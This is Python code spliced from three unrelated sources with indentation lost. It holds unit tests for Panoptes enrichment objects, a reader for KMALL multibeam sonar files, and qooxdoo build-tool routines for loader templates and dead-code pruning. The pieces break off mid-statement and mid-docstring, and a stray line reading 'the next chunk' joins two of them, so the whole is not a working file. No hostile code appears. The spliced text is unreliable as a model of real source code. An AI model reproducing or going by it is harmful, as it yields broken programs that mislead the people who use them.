self.assertEquals(repr(enrichment_group_set1), group_set_repr)
self.assertIsInstance(enrichment_group_set1.resource, PanoptesResource)
self.assertEqual(enrichment_group_set1.enrichment_group_set_creation_timestamp, mock_time.return_value)
self.assertEqual(
ordered(json.loads(json.dumps(enrichment_group_set1.enrichment, cls=PanoptesEnrichmentEncoder))),
ordered(json.loads(enrichment_data)['enrichment']))
self.assertEqual(ordered(json.loads(enrichment_group_set1.json())['enrichment']),
ordered(json.loads(enrichment_data)['enrichment']))
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroupSet('bad_resource')
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroupSet(panoptes_resource).add_enrichment_group('non_PanoptesEnrichmentGroup_obj')
enrichment_group_set2 = PanoptesEnrichmentGroupSet(panoptes_resource)
enrichment_group3 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
with self.assertRaises(AssertionError):
enrichment_group_set2.add_enrichment_group(enrichment_group3)
self.assertFalse(enrichment_group_set1 == enrichment_group1)
self.assertFalse(enrichment_group_set1 == enrichment_group_set2)
@patch('time.time', mock_time)
@patch('yahoo_panoptes.framework.resources.time', mock_time)
def test_multi_enrichment_group_set(self):
interface_validation_object = PanoptesEnrichmentInterfaceSchemaValidator()
neighbor_validation_object = PanoptesEnrichmentNeighborSchemaValidator()
panoptes_resource = self.__panoptes_resource
multi_enrichment_results_data = \
{
"group_sets": [
{
"enrichment": [
{
"data": [
{
"host_name": {
"mac": "aa:bb:cc:dd:ee:ff",
"property": "Test Property",
"vlan_id": 501
}
},
{
"host_name01": {
"mac": "aa:bb:cc:dd:ee:ff",
"property": "Test Property",
"vlan_id": 502
}
}
],
"metadata": {
"_enrichment_group_creation_timestamp": mock_time.return_value,
"_enrichment_ttl": 600,
"_execute_frequency": 120
},
"namespace": "neighbor"
},
{
"data": [
{
"int_001": {
"index": 1,
"speed": 1000,
"status": "up"
}
}
],
"metadata": {
"_enrichment_group_creation_timestamp": mock_time.return_value,
"_enrichment_ttl": 300,
"_execute_frequency": 60
},
"namespace": "interface"
}
],
"enrichment_group_set_creation_timestamp": mock_time.return_value,
"resource": {
"resource_class": "test_class",
"resource_creation_timestamp": mock_time.return_value,
"resource_endpoint": "test_endpoint01",
"resource_id": "test_resource_id01",
"resource_metadata": {
"_resource_ttl": "604800"
},
"resource_plugin": "test_plugin",
"resource_site": "test_site",
"resource_subclass": "test_subclass",
"resource_type": "test_type"
}
},
{
"enrichment": [
{
"data": [
{
"int_001": {
"index": 1,
"speed": 1000,
"status": "up"
}
}
],
"metadata": {
"_enrichment_group_creation_timestamp": mock_time.return_value,
"_enrichment_ttl": 300,
"_execute_frequency": 60
},
"namespace": "interface"
},
{
"data": [
{
"host_name": {
"mac": "aa:bb:cc:dd:ee:ff",
"property": "Test Property",
"vlan_id": 501
}
}
],
"metadata": {
"_enrichment_group_creation_timestamp": mock_time.return_value,
"_enrichment_ttl": 600,
"_execute_frequency": 120
},
"namespace": "neighbor"
}
],
"enrichment_group_set_creation_timestamp": mock_time.return_value,
"resource": {
"resource_class": "test",
"resource_creation_timestamp": mock_time.return_value,
"resource_endpoint": "test",
"resource_id": "test",
"resource_metadata": {
"_resource_ttl": "604800",
"test": "test"
},
"resource_plugin": "test",
"resource_site": "test",
"resource_subclass": "test",
"resource_type": "test"
}
}
]
}
enrichment_set1 = PanoptesEnrichmentSet('int_001')
enrichment_set1.add('speed', 1000)
enrichment_set1.add('index', 001)
enrichment_set1.add('status', 'up')
enrichment_group1 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
enrichment_group1.add_enrichment_set(enrichment_set1)
enrichment_set3 = PanoptesEnrichmentSet('host_name')
enrichment_set3.add('vlan_id', 501)
enrichment_set3.add('property', 'Test Property')
enrichment_set3.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group2 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group2.add_enrichment_set(enrichment_set3)
enrichment_group_set1 = PanoptesEnrichmentGroupSet(panoptes_resource)
enrichment_group_set1.add_enrichment_group(enrichment_group1)
enrichment_group_set1.add_enrichment_group(enrichment_group2)
panoptes_resource01 = PanoptesResource(resource_site='test_site',
resource_class='test_class',
resource_subclass='test_subclass',
resource_type='test_type',
resource_id='test_resource_id01',
resource_endpoint='test_endpoint01',
resource_plugin='test_plugin')
panoptes_resource02 = PanoptesResource(resource_site='test_site',
resource_class='test_class',
resource_subclass='test_subclass',
resource_type='test_type',
resource_id='test_resource_id02',
resource_endpoint='test_endpoint02',
resource_plugin='test_plugin')
enrichment_set4 = PanoptesEnrichmentSet('host_name01')
enrichment_set4.add('vlan_id', 502)
enrichment_set4.add('property', 'Test Property')
enrichment_set4.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group3 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group3.add_enrichment_set(enrichment_set3)
enrichment_group3.add_enrichment_set(enrichment_set4)
enrichment_group_set2 = PanoptesEnrichmentGroupSet(panoptes_resource01)
enrichment_group_set2.add_enrichment_group(enrichment_group1)
enrichment_group_set2.add_enrichment_group(enrichment_group3)
multi_enrichment_group_set = PanoptesEnrichmentMultiGroupSet()
multi_enrichment_group_set.add_enrichment_group_set(enrichment_group_set1)
multi_enrichment_group_set.add_enrichment_group_set(enrichment_group_set2)
multi_enrichment_group_set_repr = "PanoptesEnrichmentMultiGroupSet[PanoptesEnrichmentGroupSet[resource:" \
"plugin|test_plugin|site|test_site|class|test_class|subclass|test_subclass" \
"|type|test_type|id|test_resource_id01|endpoint|test_endpoint01," \
"enrichment_group_set_creation_timestamp:{}," \
"PanoptesEnrichmentGroup[namespace:interface,enrichment_ttl:300," \
"execute_frequency:60,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[int_001[status:up,index:1,speed:1000]]]," \
"PanoptesEnrichmentGroup[namespace:neighbor,enrichment_ttl:600," \
"execute_frequency:120,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[host_name[mac:aa:bb:cc:dd:ee:ff,property:" \
"Test Property,vlan_id:501]],PanoptesEnrichmentSet[host_name01" \
"[mac:aa:bb:cc:dd:ee:ff,property:Test Property,vlan_id:502]]]]," \
"PanoptesEnrichmentGroupSet[resource:plugin|test|site|test|class|test|" \
"subclass|test|type|test|id|test|endpoint|test," \
"enrichment_group_set_creation_timestamp:{}," \
"PanoptesEnrichmentGroup[namespace:interface,enrichment_ttl:300," \
"execute_frequency:60,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[int_001[status:up,index:1,speed:1000]]]," \
"PanoptesEnrichmentGroup[namespace:neighbor,enrichment_ttl:600," \
"execute_frequency:120,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[host_name[mac:aa:bb:cc:dd:ee:ff,property:" \
"Test Property,vlan_id:501]]]]]".format(mock_time.return_value,
mock_time.return_value,
mock_time.return_value,
mock_time.return_value,
mock_time.return_value,
mock_time.return_value)
self.assertEquals(repr(multi_enrichment_group_set), multi_enrichment_group_set_repr)
self.assertEquals(len(multi_enrichment_group_set.enrichment_group_sets), 2)
self.assertEquals(ordered(json.loads(multi_enrichment_group_set.json())),
ordered(multi_enrichment_results_data))
self.assertEquals(len(multi_enrichment_group_set), 2)
multi_enrichment_group_set.add_enrichment_group_set(enrichment_group_set2)
self.assertEquals(len(multi_enrichment_group_set), 2)
enrichment_group_set3 = PanoptesEnrichmentGroupSet(panoptes_resource02)
enrichment_group_set3.add_enrichment_group(enrichment_group1)
multi_enrichment_group_set.add_enrichment_group_set(enrichment_group_set3)
self.assertEquals(len(multi_enrichment_group_set), 3)
with self.assertRaises(AssertionError):
multi_enrichment_group_set.add_enrichment_group_set('non_enrichment_group')
enrichment_group_set3 = PanoptesEnrichmentGroupSet(panoptes_resource01)
with self.assertRaises(AssertionError):
multi_enrichment_group_set.add_enrichment_group_set(enrichment_group_set3)
class TestPanoptesEnrichmentCacheStore(unittest.TestCase):
@patch('redis.StrictRedis', PanoptesMockRedis)
@patch('time.time', mock_time)
def setUp(self):
self.my_dir, self.panoptes_test_conf_file = _get_test_conf_file()
self._panoptes_context = PanoptesContext(self.panoptes_test_conf_file,
key_value_store_class_list=[PanoptesEnrichmentCacheKeyValueStore,
PanoptesResourcesKeyValueStore])
self._enrichment_kv = self._panoptes_context.get_kv_store(PanoptesEnrichmentCacheKeyValueStore)
self._panoptes_resource = PanoptesResource(resource_site='test_site',
resource_class='test_class',
resource_subclass='test_subclass',
resource_type='test_type',
resource_id='test_resource_id',
resource_endpoint='test_endpoint',
resource_plugin='test_plugin')
interface_validation_object = PanoptesEnrichmentInterfaceSchemaValidator()
neighbor_validation_object = PanoptesEnrichmentNeighborSchemaValidator()
enrichment_set1 = PanoptesEnrichmentSet('int_001')
enrichment_set1.add('speed', 1000)
enrichment_set1.add('index', 001)
enrichment_set1.add('status', 'up')
enrichment_set2 = PanoptesEnrichmentSet('int_002')
enrichment_set2.add('speed', 1000)
enrichment_set2.add('index', 002)
enrichment_set2.add('status', 'down')
enrichment_group1 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
enrichment_group1.add_enrichment_set(enrichment_set1)
enrichment_group1.add_enrichment_set(enrichment_set2)
enrichment_set3 = PanoptesEnrichmentSet('host_name')
enrichment_set3.add('vlan_id', 501)
enrichment_set3.add('property', 'Test Property')
enrichment_set3.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group2 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group2.add_enrichment_set(enrichment_set3)
self.enrichment_group_set1 = PanoptesEnrichmentGroupSet(self._panoptes_resource)
self.enrichment_group_set1.add_enrichment_group(enrichment_group1)
self.enrichment_group_set1.add_enrichment_group(enrichment_group2)
self._panoptes_resource01 = PanoptesResource(resource_site='test_site',
resource_class='test_class',
resource_subclass='test_subclass',
resource_type='test_type',
resource_id='test_resource_id01',
resource_endpoint='test_endpoint01',
resource_plugin='test_plugin')
enrichment_set4 = PanoptesEnrichmentSet('host_name01')
enrichment_set4.add('vlan_id', 502)
enrichment_set4.add('property', 'Test Property')
enrichment_set4.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group3 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group3.add_enrichment_set(enrichment_set3)
enrichment_group3.add_enrichment_set(enrichment_set4)
self.enrichment_group_set2 = PanoptesEnrichmentGroupSet(self._panoptes_resource01)
self.enrichment_group_set2.add_enrichment_group(enrichment_group1)
self.enrichment_group_set2.add_enrichment_group(enrichment_group3)
self._multi_enrichment_group_set = PanoptesEnrichmentMultiGroupSet()
self._multi_enrichment_group_set.add_enrichment_group_set(self.enrichment_group_set1)
self._multi_enrichment_group_set.add_enrichment_group_set(self.enrichment_group_set2)
@patch('time.time', mock_time)
def test_panoptes_enrichment_set(self):
enrichment_set1 = PanoptesEnrichmentSet('int_001')
enrichment_set1.add('speed', 1000)
enrichment_set1.add('index', 001)
enrichment_set1.add('status', 'up')
self.assertEquals(enrichment_set1.json(),
'{"int_001": {"index": 1, "speed": 1000, "status": "up"}}')
self.assertEquals(repr(enrichment_set1),
"PanoptesEnrichmentSet[int_001[status:up,index:1,speed:1000]]")
enrichment_set2 = PanoptesEnrichmentSet('int_002')
enrichment_set2.add('speed', 1000)
enrichment_set2.add('index', 002)
enrichment_set2.add('status', 'down')
interface_validation_object = PanoptesEnrichmentInterfaceSchemaValidator()
enrichment_group1 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
        self.assertFalse(enrichment_set1 ==
the next chunk
srchdat = self.FID.read(min(20, (start_ptr + file_length) - cur_ptr))
stx_idx = srchdat.find(b'#')
if stx_idx >= 0:
possible_start = cur_ptr + stx_idx
self.FID.seek(possible_start)
datchk = self.FID.read(4)
m = self.datagram_ident_search.search(datchk, 0)
if m:
self.FID.seek(possible_start - 4)
return True
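    # In short: the scan above hunts for the '#' that starts a KMALL datagram ident (e.g.
    # b'#MRZ'), confirms the four-byte ident with datagram_ident_search, and then rewinds
    # four bytes, presumably to the length field that precedes the ident, so the caller is
    # positioned at the start of the datagram.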
def _divide_rec(self, rec):
"""
MRZ comes in from sequential read by time/ping. Each ping may have multiple sectors to it which we want
to treat as separate pings. Do this by generating a new record for each sector in the ping. When rec is MRZ,
the return is a list of rec split by sector. Otherwise returns the original rec as the only element in a list
returns: totalrecs, list of split rec
"""
if self.datagram_ident != 'MRZ':
return [rec]
elif rec['pingInfo']['numTxSectors'] == 1:
return [rec]
else:
totalrecs = []
pingtime = rec['header']['dgtime']
            for sec in rec['txSectorInfo']['txSectorNumb']:
                split_rec = copy.copy(rec)
                # copy the header dict as well; with only a shallow copy of rec, every split record
                # would share (and overwrite) the same header when the per-sector ping time is set below
                split_rec['header'] = copy.copy(rec['header'])
                split_rec['txSectorInfo'] = {k: v[sec] for (k, v) in rec['txSectorInfo'].items()}
                rx_index = np.where(np.array(rec['sounding']['txSectorNumb']) == sec)
                split_rec['sounding'] = {k: np.array(v)[rx_index] for (k, v) in rec['sounding'].items()}
                # ping time equals datagram time plus sector transmit delay
                split_rec['header']['dgtime'] = pingtime + split_rec['txSectorInfo']['sectorTransmitDelay_sec']
                totalrecs.append(split_rec)
return totalrecs
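    # A rough sketch of the split above (field values are illustrative assumptions): an MRZ
    # rec with numTxSectors == 2 and soundings tagged txSectorNumb = [0, 0, 1] becomes two
    # records, one holding the two sector-0 soundings and one holding the single sector-1
    # sounding, each with its ping time shifted by that sector's sectorTransmitDelay_sec.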
def _pad_to_dense(self, arr, padval=999.0, maxlen=500, override_type=None, detectioninfo=False):
"""
Appends the minimal required amount of zeroes at the end of each array in the jagged array `M`, such that `M`
loses its jaggedness.
A required operation for our sector-wise read. Each sector has a varying amount of beams over time, so the
resulting number of values per ping (beam pointing angle for example) will differ between pings. Here we make
these ragged arrays square, by using the padval to fill in the holes.
A padval of 999 is arbitrary, but we use that nodatavalue in kluster to reform pings and do processing, so
leave at 999 for Kluster. maxlen is the max number of expected beams per sector.
returns: Z, square array padded with padval where arr is ragged
"""
# override the dynamic length of beams across records by applying static length limit.
# ideally this should cover all cases
if override_type is not None:
typ = override_type
else:
typ = arr[0].dtype
Z = np.full((len(arr), maxlen), padval, dtype=typ)
for enu, row in enumerate(arr):
# some records being read have NaNs in them unexpectedly, like part of the record isn't being read
row[np.isnan(row)] = 0
if detectioninfo:
Z[enu, :len(row)] = self.translate_detectioninfo(row)
else:
Z[enu, :len(row)] = row
return Z
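    # A minimal sketch of the padding above (maxlen reduced to 5 for brevity):
    #   arr = [np.array([1., 2., 3.]), np.array([4., 5.])]
    #   self._pad_to_dense(arr, padval=999.0, maxlen=5)
    #   -> array([[  1.,   2.,   3., 999., 999.],
    #             [  4.,   5., 999., 999., 999.]])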
def _build_sequential_read_categories(self):
"""
sequential_read_records will go through the file and build a dictionary of the desired records. Specify those
records that you want here, in recs_categories. I use a dot notation to access the correct attribute, see
below.
"""
recs_categories = {'SKM': ['sample.KMdefault.dgtime', 'sample.KMdefault.roll_deg', 'sample.KMdefault.pitch_deg',
'sample.KMdefault.heave_m', 'sample.KMdefault.heading_deg',
'sample.KMdefault.latitude_deg', 'sample.KMdefault.longitude_deg',
'sample.KMdefault.ellipsoidHeight_m'],
'IIP': ['header.dgtime', 'install_txt'],
'MRZ': ['header.dgtime', 'cmnPart.pingCnt', 'cmnPart.rxTransducerInd',
'pingInfo.soundSpeedAtTxDepth_mPerSec', 'pingInfo.numTxSectors', 'header.systemID',
'txSectorInfo.txSectorNumb', 'txSectorInfo.tiltAngleReTx_deg',
'txSectorInfo.sectorTransmitDelay_sec', 'txSectorInfo.centreFreq_Hz',
'sounding.beamAngleReRx_deg', 'sounding.txSectorNumb', 'sounding.detectionType',
'sounding.qualityFactor', 'sounding.twoWayTravelTime_sec',
'pingInfo.modeAndStabilisation', 'pingInfo.pulseForm', 'pingInfo.depthMode'],
'IOP': ['header.dgtime', 'runtime_txt'],
'SVP': ['time_sec', 'sensorData.depth_m', 'sensorData.soundVelocity_mPerSec']}
recs_categories_translator = {'SKM': {'sample.KMdefault.dgtime': [['attitude', 'time'], ['navigation', 'time']],
'sample.KMdefault.roll_deg': [['attitude', 'roll']],
'sample.KMdefault.pitch_deg': [['attitude', 'pitch']],
'sample.KMdefault.heave_m': [['attitude', 'heave']],
'sample.KMdefault.heading_deg': [['attitude', 'heading']],
'sample.KMdefault.latitude_deg': [['navigation', 'latitude']],
'sample.KMdefault.longitude_deg': [['navigation', 'longitude']],
'sample.KMdefault.ellipsoidHeight_m': [['navigation', 'altitude']]},
'MRZ': {'header.dgtime': [['ping', 'time']],
'cmnPart.pingCnt': [['ping', 'counter']],
'cmnPart.rxTransducerInd': [['ping', 'rxid']],
'pingInfo.soundSpeedAtTxDepth_mPerSec': [['ping', 'soundspeed']],
'pingInfo.numTxSectors': [['ping', 'ntx']],
'header.systemID': [['ping', 'serial_num']],
'txSectorInfo.txSectorNumb': [['ping', 'txsectorid']],
'txSectorInfo.tiltAngleReTx_deg': [['ping', 'tiltangle']],
'txSectorInfo.sectorTransmitDelay_sec': [['ping', 'delay']],
'txSectorInfo.centreFreq_Hz': [['ping', 'frequency']],
'sounding.beamAngleReRx_deg': [['ping', 'beampointingangle']],
'sounding.txSectorNumb': [['ping', 'txsector_beam']],
'sounding.detectionType': [['ping', 'detectioninfo']],
'sounding.qualityFactor': [['ping', 'qualityfactor_percent']],
'sounding.twoWayTravelTime_sec': [['ping', 'traveltime']],
'pingInfo.modeAndStabilisation': [['ping', 'yawpitchstab']],
'pingInfo.pulseForm': [['ping', 'mode']],
'pingInfo.depthMode': [['ping', 'modetwo']]},
'IIP': {'header.dgtime': [['installation_params', 'time']],
'install_txt': [['installation_params', 'installation_settings']]},
'IOP': {'header.dgtime': [['runtime_params', 'time']],
'runtime_txt': [['runtime_params', 'runtime_settings']]},
'SVP': {'time_sec': [['profile', 'time']],
'sensorData.depth_m': [['profile', 'depth']],
'sensorData.soundVelocity_mPerSec': [['profile', 'soundspeed']]}}
recs_categories_result = {
'attitude': {'time': None, 'roll': None, 'pitch': None, 'heave': None, 'heading': None},
'installation_params': {'time': None, 'serial_one': None, 'serial_two': None,
'installation_settings': None},
'ping': {'time': None, 'counter': None, 'rxid': None, 'soundspeed': None, 'ntx': None,
'serial_num': None, 'txsectorid': None, 'tiltangle': None, 'delay': None,
'frequency': None, 'beampointingangle': None, 'txsector_beam': None,
'detectioninfo': None, 'qualityfactor_percent': None, 'traveltime': None, 'mode': None,
'modetwo': None, 'yawpitchstab': None},
'runtime_params': {'time': None, 'runtime_settings': None},
'profile': {'time': None, 'depth': None, 'soundspeed': None},
'navigation': {'time': None, 'latitude': None, 'longitude': None, 'altitude': None}}
return recs_categories, recs_categories_translator, recs_categories_result
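    # A short sketch of how the dot notation above is resolved in sequential_read_records:
    # a subrec such as 'sample.KMdefault.dgtime' is split on '.' and used to index into the
    # decoded datagram, i.e. rec['sample']['KMdefault']['dgtime'], and the translator then
    # routes that value to both recs_to_read['attitude']['time'] and
    # recs_to_read['navigation']['time'].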
def _finalize_records(self, recs_to_read, recs_count):
"""
Take output from sequential_read_records and alter the type/size/translate as needed for Kluster to read and
convert to xarray. Major steps include
- adding empty arrays so that concatenation later on will work
- pad_to_dense to convert the ragged sector-wise arrays into square numpy arrays
- translate the runtime parameters from integer/binary codes to string identifiers for easy reading (and to
allow comparing results between different file types)
returns: recs_to_read, dict of dicts finalized
"""
# drop the delay array and txsector_beam array since we've already used it for adjusting ping time and building
# sector masks
recs_to_read['ping'].pop('delay')
recs_to_read['ping'].pop('txsector_beam')
        # need to force in the serial number, it's not in the header anymore with these kmall files...
if recs_to_read['installation_params']['installation_settings'] is not None:
inst_params = recs_to_read['installation_params']['installation_settings'][0]
if inst_params is not None:
recs_to_read['installation_params']['serial_one'] = np.array([int(inst_params['pu_serial_number'])])
# currently nothing in the record for identifying the second system in a dual head
recs_to_read['installation_params']['serial_two'] = np.array([0])
for rec in recs_to_read:
for dgram in recs_to_read[rec]:
if recs_count[rec] == 0:
if rec != 'runtime_params' or dgram == 'time':
# found no records, empty array
recs_to_read[rec][dgram] = np.zeros(0)
else:
# found no records, empty array of strings for the mode/stab records
recs_to_read[rec][dgram] = np.zeros(0, 'U2')
elif rec == 'ping':
if dgram in ['beampointingangle', 'traveltime', 'qualityfactor_percent']:
# these datagrams can vary in number of beams, have to pad with 999 for 'jaggedness'
recs_to_read[rec][dgram] = self._pad_to_dense(recs_to_read[rec][dgram])
                elif dgram in ['detectioninfo', 'qualityfactor']:
                    # same for detection info, but it also needs to be converted to something other than int8
                    recs_to_read[rec][dgram] = self._pad_to_dense(recs_to_read[rec][dgram], override_type=int)
                elif dgram == 'yawpitchstab':  # the key used in recs_categories_result above
                    recs_to_read[rec][dgram] = self.translate_yawpitch_tostring(np.array(recs_to_read[rec][dgram]))
elif dgram == 'mode':
recs_to_read[rec][dgram] = self.translate_mode_tostring(np.array(recs_to_read[rec][dgram]))
elif dgram == 'modetwo':
recs_to_read[rec][dgram] = self.translate_mode_two_tostring(np.array(recs_to_read[rec][dgram]))
else:
recs_to_read[rec][dgram] = np.array(recs_to_read[rec][dgram])
elif rec in ['navigation', 'attitude']: # these recs have time blocks of data in them, need to be concatenated
recs_to_read[rec][dgram] = np.concatenate(recs_to_read[rec][dgram])
else:
recs_to_read[rec][dgram] = np.array(recs_to_read[rec][dgram])
return recs_to_read
def sequential_read_records(self, start_ptr=0, end_ptr=0, first_installation_rec=False):
"""
Read the file and return a dict of the wanted records/fields according to recs_categories. If start_ptr/end_ptr
is provided, start and end at those byte offsets.
returns: recs_to_read, dict of dicts for each desired record read sequentially, see recs_categories
"""
recs_categories, recs_categories_translator, recs_categories_result = self._build_sequential_read_categories()
wanted_records = list(recs_categories.keys())
recs_to_read = copy.deepcopy(recs_categories_result)
recs_count = dict([(k, 0) for k in recs_to_read])
if self.FID is None:
self.OpenFiletoRead()
filelen = self._initialize_sequential_read(start_ptr, end_ptr)
if start_ptr:
self.seek_next_startbyte(filelen, start_ptr=start_ptr)
while not self.eof:
if self.FID.tell() >= start_ptr + filelen:
self.eof = True
break
self.decode_datagram()
if self.datagram_ident not in wanted_records:
self.skip_datagram()
continue
self.read_datagram()
for rec_ident in list(recs_categories_translator[self.datagram_ident].values())[0]:
recs_count[rec_ident[0]] += 1
rec = self.datagram_data
recs = self._divide_rec(rec) # split up the MRZ record for multiple sectors, otherwise just returns [rec]
for rec in recs:
for subrec in recs_categories[self.datagram_ident]:
# override for nested recs, designated with periods in the recs_to_read dict
if subrec.find('.') > 0:
if len(subrec.split('.')) == 3:
rec_key = subrec.split('.')[2]
tmprec = rec[subrec.split('.')[0]][subrec.split('.')[1]][rec_key]
else:
rec_key = subrec.split('.')[1]
tmprec = rec[subrec.split('.')[0]][rec_key]
else:
rec_key = subrec
tmprec = rec[rec_key]
                    if subrec in ['install_txt', 'runtime_txt']:  # str; casting to list would split the string, don't want that
val = [tmprec]
else:
try: # flow for array/list attribute
val = [np.array(tmprec)]
except TypeError: # flow for float/int attribute
val = [tmprec]
# generate new list or append to list for each rec of that dgram type found
for translated in recs_categories_translator[self.datagram_ident][subrec]:
if recs_to_read[translated[0]][translated[1]] is None:
recs_to_read[translated[0]][translated[1]] = copy.copy(val)
else:
recs_to_read[translated[0]][translated[1]].extend(val)
if self.datagram_ident == 'IIP' and first_installation_rec:
self.eof = True
recs_to_read = self._finalize_records(recs_to_read, recs_count)
return recs_to_read
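    # A minimal usage sketch (the file name is an assumption, and 'reader' stands in for an
    # instance of this class, however it is constructed in your code):
    #   reader = ThisReaderClass('somefile.kmall')   # hypothetical instantiation
    #   recs = reader.sequential_read_records()
    #   recs['ping']['time']      # per-sector ping times (see _divide_rec)
    #   recs['attitude']['roll']  # concatenated roll samples from the SKM datagrams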
def translate_yawpitch_tostring(self, arr):
"""
Translate the binary code to a string identifier. Allows user to understand the mode
without translating the integer code in their head. Kluster will build plots using these string identifiers
in the legend.
'yawpitchstabilization' = 'Y' for Yaw stab, 'P' for pitch stab, 'PY' for both, 'N' for neither
        # xxxxxxx0 no pitch stab, xxxxxxx1
        # Returns the JS snippet that is to be plugged into the decodeUris
# function in the loader.
def loaderDecodeUrisPlug(script, compConf):
plugCodeFile = compConf.get("code/decode-uris-plug", False)
plugCode = ""
if plugCodeFile:
plugCode = filetool.read(self._config.absPath(plugCodeFile)) # let it bomb if file can't be read
return plugCode.strip()
##
# Replace the placeholders in the loader template.
# @throw KeyError a placeholder could not be filled from <vals>
def loaderFillTemplate(vals, template):
templ = MyTemplate(template)
result = templ.substitute(vals)
return result
##
# Translate URI data to JavaScript
# using Package objects
def packageUrisToJS(packages, version):
allUris = []
for packageId, package in enumerate(packages):
package_uris = []
if package.file: # build
namespace = "__out__"
fileId = package.file
relpath = OsPath(fileId)
shortUri = Uri(relpath.toUri())
entry = "%s:%s" % (namespace, shortUri.encodedValue())
package_uris.append(entry)
package.files.append(entry) # TODO: make package.file obsolete
elif package.files: # hybrid
package_uris = package.files
else: # "source" :
for clazz in package.classes:
namespace = clazz.library.namespace
relpath = OsPath(clazz.relpath)
shortUri = Uri(relpath.toUri())
entry = "%s:%s" % (namespace, shortUri.encodedValue())
package_uris.append(entry)
                    package.files.append(entry)  # TODO: this should be done elsewhere?!
allUris.append(package_uris)
return allUris
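        # A small sketch of the entry format built above (file names are illustrative):
        # a compiled ("build") package contributes one "__out__:<encoded uri>" entry such as
        # "__out__:myapp.a1b2c3.js", while a "source" package contributes one
        # "<namespace>:<encoded class uri>" entry per class, e.g. "qx:qx/core/Object.js".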
##
# Find and read the loader template.
def loaderTemplate(script, compConf):
templatePath = compConf.get("paths/loader-template", None)
if not templatePath:
# use default template
templatePath = os.path.join(filetool.root(), os.pardir, "data", "generator", "loader.tmpl.js")
templateCont = filetool.read(templatePath)
return templateCont, templatePath
def getPackageData(package):
data = {}
data["resources"] = package.data.resources
if not self._job.get("packages/i18n-as-parts", False):
data["translations"] = package.data.translations
data["locales"] = package.data.locales
data = json.dumpsCode(data)
data += ';\n'
return data
##
# process "statics" optimization
#
def optimizeDeadCode(classList, featureMap, compConf, treegen, log_progress):
##
            # define a criterion for when the optimization is saturated
            # (here: when the number of nullrefs hasn't changed over the last 4 iterations)
def atLimit(featureMap, lmin=[]):
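                # NB: the mutable default `lmin=[]` is used deliberately as an accumulator that
                # persists across calls, recording the nullrefs count seen at each iteration of
                # the pruning loop below so the last four counts can be compared.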
# array of (class.id, feature) the feature ref count of which is 0
nullrefs = [(cls, feat) for cls in featureMap
for feat in featureMap[cls] if not featureMap[cls][feat].hasref()]
cmin = len(nullrefs)
lmin.append(cmin)
# use the last 4 length values
if len(lmin)>3 and all([x==cmin for x in lmin[-4:]]):
return True
else:
return False
##
# print features with external usages
def debugFeatureMap(featureMap):
for key in featureMap:
print key
features = featureMap[key]
for feat in features:
ext_refs = set(["%s:%s" % (ref.requestor, ref.line) for ref in features[feat]._refs if ref.requestor != key])
print "\t", feat, ":", features[feat]._ref_cnt, "%r" % list(ext_refs)
# a class list that skips the head classes
def classlistiter():
for c in classList:
if c.id not in head_classes:
yield c
def external_use(clazz, featureMap):
ext_use = False
class_features = featureMap[clazz.id]
for feat in class_features:
if not class_features[feat].hasref():
continue
else:
external_classes = [x for x in class_features[feat]._refs if x.requestor != clazz.id]
if external_classes:
ext_use = True
break
return ext_use
def remove_class_refs(clazz, featureMap):
for key in featureMap:
for feat in featureMap[key]:
uf = featureMap[key][feat]
for ref in uf._refs[:]:
if ref.requestor == clazz.id:
uf.decref(clazz.id)
def check_reachability_graph(head_classes, featureMap, classList):
gr = graph.digraph()
[gr.add_node(s) for s in featureMap.keys()] # assert featureMap.keys() == [classList.id's]
# add "using" edges (featureMap is a used-by mapping)
for cls in featureMap:
other_using = [dep.name for x in featureMap for y in featureMap[x] for dep in featureMap[x][y]._refs if dep.requestor==cls and dep.name!=cls]
for other in other_using:
gr.add_edge(cls, other)
log_progress()
access_matrix = gr.accessibility()
reachable_nodes = set()
for head_class in head_classes:
reachable_nodes.update(access_matrix[head_class])
# purge unreachable nodes
for cls in classList[:]:
if cls.id not in reachable_nodes:
classList.remove(cls)
#self._console.info("removing %s" % cls.id)
log_progress()
# ------------------------------------------------------------
# collect all head classes, so they are not removed
head_classes = []
[head_classes.extend(x.initial_deps) for x in script.parts.values()]
# seed Class._tmp_tree with the right tree
for clazz in classList:
log_progress()
clazz._tmp_tree = clazz.tree(treegen)
if "variants" in compConf.optimize:
clazz._tmp_tree = clazz.optimize(None, ["variants"], compConf.variantset) # using None allows us to re-used a cached tree
# then, prune as long as we have ref counts == 0 on features
while True:
# break the loop if we are not making any more progress ("fixed point")
if atLimit(featureMap):
break
# (a) first, let clazz.optimize remove those features
for clazz in classlistiter():
clazz._tmp_tree = clazz.optimize(clazz._tmp_tree, ["statics"], featureMap=featureMap)
log_progress()
# (b) then, remove entire unused classes from classlist
for clazz in classlistiter():
if clazz.id in featureMap:
if (not featureMap[clazz.id] # no feature is used
or not external_use(clazz, featureMap) # features only used by the class itself
):
classList.remove(clazz)
del featureMap[clazz.id]
remove_class_refs(clazz, featureMap) # remove all the class's UsedFeature entries as well
log_progress()
#self._console.info("removing %s" % clazz.id)
# removing entire classes might remove dependencies of construct, defer, extend, etc,
# so this might have again zero'ed usage counts of remaining features, so we have to loop
# Lastly, when we cannot reduce anymore by looking at feature usage,
# check reachability graph of head classes
check_reachability_graph(head_classes, featureMap, classList)
# debug hook
if 0: debugFeatureMap(featureMap)
# logging
self._console.dotclear()
self._console.indent()
for cls in classList:
self._console.info(cls.id)
self._console.info("Number of classes after static optimization: %d" % len(classList))
